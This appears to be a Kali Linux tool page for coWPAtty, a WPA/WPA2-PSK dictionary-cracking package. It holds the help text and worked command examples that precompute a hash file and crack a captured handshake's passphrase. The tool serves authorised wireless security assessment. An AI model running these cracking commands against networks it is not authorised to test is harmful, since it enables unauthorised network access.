coWPAtty Package Description

Implementation of an offline dictionary attack against WPA/WPA2 networks using PSK-based authentication (e.g. WPA-Personal). Many enterprise networks deploy PSK-based authentication mechanisms for WPA/WPA2 since it is much easier than establishing the necessary RADIUS, supplicant and certificate authority architecture needed for WPA-Enterprise authentication. Cowpatty can implement an accelerated attack if a precomputed PMK file is available for the SSID that is being assessed.

Source: https://github.com/joswr1ght/cowpatty
coWPAtty Homepage | Kali coWPAtty Repo

  • Author: Joshua Wright
  • License: BSD 3-clause

Tools included in the cowpatty package

cowpatty – WPA-PSK dictionary attack
root@kali:~# cowpatty -h
cowpatty 4.8 - WPA-PSK dictionary attack. <jwright@hasborg.com>

Usage: cowpatty [options]

-f Dictionary file
-d Hash file (genpmk)
-r Packet capture file
-s Network SSID (enclose in quotes if SSID includes spaces)
-c Check for valid 4-way frames, does not crack
-h Print this help information and exit
-v Print verbose information (more -v for more verbosity)
-V Print program version and exit

genpmk – WPA-PSK precomputation attack

root@kali:~# genpmk -h
genpmk 1.3 - WPA-PSK precomputation attack. <jwright@hasborg.com>
Usage: genpmk [options]

-f Dictionary file
-d Output hash file
-s Network SSID
-h Print this help information and exit
-v Print verbose information (more -v for more verbosity)
-V Print program version and exit

After precomputing the hash file, run cowpatty with the -d argument.

genpmk Usage Example

Use the provided dictionary file (-f /usr/share/wordlists/nmap.lst) to generate a hashfile, saving it to a file (-d cowpatty_dict) for the given ESSID (-s securenet):

root@kali:~# genpmk -f /usr/share/wordlists/nmap.lst -d cowpatty_dict -s securenet
genpmk 1.3 - WPA-PSK precomputation attack. \&lt;jwright@hasborg.com\&gt;
File cowpatty_dict does not exist, creating.
key no. 1000: pinkgirl
1641 passphrases tested in 3.60 seconds: 456.00 passphrases/second

cowpatty Usage Example

Use the provided hashfile (-d cowpatty_dict), read the packet capture (-r Kismet-20181113-13-37-00-1.pcapdump), and crack the password for the given ESSID (-s 6F36E6):

root@kali:~# cowpatty -d cowpatty_dict -r Kismet-20181113-13-37-00-1.pcapdump -s 6F36E6
cowpatty 4.8 - WPA-PSK dictionary attack. <jwright@hasborg.com>

Collected all necessary data to mount crack against WPA2/PSK passphrase.
Starting dictionary attack. Please be patient.

The PSK is "12345678".

5 passphrases tested in 0.00 seconds: 50000.00 passphrases/second
Menu